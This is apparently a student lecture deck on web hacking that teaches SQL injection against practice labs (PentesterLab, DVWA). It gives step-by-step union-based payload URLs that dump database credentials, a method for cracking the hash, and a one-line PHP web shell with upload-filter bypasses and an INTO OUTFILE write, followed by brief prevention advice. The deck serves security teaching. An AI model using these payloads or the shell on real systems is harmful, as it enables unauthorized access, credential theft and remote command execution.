web hacking series part 3

~ Aditya Kamat

BMS College of Engineering

WEB HACKING SERIES PART-3

TOPICS LEARNT TILL NOW :--

• Basics of web and a little about networks.

• HTML injection.

• SQL injection to bypass authentication.

• Buffer overflow attack.

CONT…

• Bypass Authentication Via Authentication Token Manipulation.

• Session hijacking.

• Brute forcing login pages using burp.

• HTTP parameter pollution.

WHAT WILL BE COVERED TODAY:-• SQL injection (Sqli).

• Uploading a shell and gaining remote code execution capabilities on the server.

• And the prevention of course.

WHAT IS SQL??

• Sequential Query Language is a language used to interact with the database.

• We are allowed to ask questions in the form of queries and the answers are known as the results.

• It’s syntax is very simple and similar to the natural language (English).

BASIC OPERATIONS ON A DATABASE:-

• Create: Insert data into a database.

• Read: Read data from a table in a database.

• Update: Update some information present in a database.

• Delete: Delete information from a database.

IMPORTANT SQL COMMANDS:-

Source:w3schools.org

LET’S HAVE A LOOK AT AN EXAMPLE QUERY:-

• Select * from colleges;

• Assuming a table with the name “colleges” exist.

• The result of the query will be all the rows of the table.

• We can add a constraint with the keyword ‘where’. Example: select * from colleges where name=‘bmsce’; This selects the row which contains ‘bmsce’ in its name column.

STEPS FOR INJECTION:-

• Search for a vulnerable point (injection point).

• Check out the database used.

• Inject queries to dump required data.

WHAT SHOULD WE FOCUS ON?

• Normal query in websites to check for username and password of a user: select username,password from users where username=‘x’ and password=‘y’;

• If the query returns a row or more, it means that the user is authentic.

• To become the authenticated user, we need to bypass the password check by using ‘or 1=1—

• ‘ is used to close the password acceptance string and or 1=1 returns true, thus authenticating the user.

LET’S START OFF WITH A DEMO!

EXAMPLE 1--

STEP 1:

• Check if the site is vulnerable by adding a single quote at the end.

• http://192.16856.100/cat.php?id=1'

STEP 2:• Check the number of columns present in the table used by the

web page.

• http://192.168.56.100/cat.php?id=1 order by 1




• http://192.168.56.100/cat.php?id=1 order by 5 (We get an error here).

STEP 3:• Find out the vulnerable column which can be used to dump the

data.

• http://192.168.56.100/cat.php?id=-1 union select 1,2,3,4

• Union operator is used to combine the result of many select queries and it also removes duplicate rows.

• The above query returns a number corresponding to a column which is vulnerable.

STEP 4 (NOT NECESSARY):

• http://192.168.56.100/cat.php?id=-1 union select 1,@@version,3,4

• @@version return a string that indicates the MySQL server version

• @@database returns the default (current) database name

• @@user returns the user name and host name provided by the client.

STEP 5:• http://192.168.56.100/cat.php?id=-1 union select

1,table_name,3,4 from information_schema.tables

• We retrieve all the tables present in the database.

• Information_schema.tables consist of the names of all the tables present.


1,column_name,3,4 from information_schema.columns where table_name='users‘

• From the previous query, we choose the right table and find out all the columns present in it through this query. Here, we have chosen the table ‘users’


1,concat(id,0x3a,login,0x3a,password),3,4 from users

• We dump the data present in users table. We need to specify the name of the columns from which the data is to be dumped.

• 0x3a is the hex equivalent for ‘:’ . It is used to differentiate between the values from each column.

WHAT NEXT??

• We got to decode the password we obtained and use it to login as admin.

• The password is in md5 hash format. It can be decoded to ‘P4ssw0rd’ using some online services.

• Upload a shell and gain access to the web server.

UPLOADING A SHELL:

• After gaining admin access, try finding a page which allows uploading of images/documents (/admin/new.php in our case).

• Upload our simple php script to be able to pass system commands in the url.

• Some website don’t allow you to upload a php file directly. Try changing the extensions to one of these: “Php, php3, pHp, phP, php.test” .

• If none of these work, use tamper data to change the extension.

• Last hope is to encode the php script into an image using exiftool and then upload the image.

EXAMPLE 2(DVWA)

LET US TRY OUT THE SAME STEPS HERE TOO!

• Try out steps 1 to 7 which was done in the previous example.

NEW WAY TO UPLOAD A SHELL:-• Using “INTO OUTFILE”, we can redirect a stream of text to a

file.

• Simple query we will use:http://192.168.56.100/hacks/DVWA-master/vulnerabilities/sqli/?id=' union select unhex(hex(""hi"")),2 INTO OUTFILE "C:\\xampp\\htdocs\\hacks\\DVWA-master\\text.php"--+&Submit=Submit#

CONTD…

• In this way, we can insert the php code we used in the previous example to be able to execute system commands.<?php

system($_GET['cmd']);

?>

DONE!!!

SRC:null-byte.wonderhowto.com

PREVENTION:-

• Validate all user supplied input.

• Use prepared statements.

• Review code for all possible injection points.

• Store important information in the form of salt+hash in the database.

Ref:https://www.owasp.org/index.php/Input_Validation_Cheat_Sheet

CONT…

• Use a web application firewall.

• Run RIPS scanner on PHP code.

• Manage Database access accounts with right privileges.

ADDITIONAL RESOURCES:-• Try out more php shells at: r57shell.net

• SQL injection tutorials at:

https://www.youtube.com/watch?v=_Y8A-1GAUiY&list=PLMA3sO-IlLtuREVEaRX0s8d2WeUM0E4bE

http://www.sqlinjection.net/

• Practice at: hackthissite.org

• Practice VM : https://pentesterlab.com/exercises/from_sqli_to_shell/iso

• DVWA: http://www.dvwa.co.uk/

THANK YOU

web hacking series part 3

Technology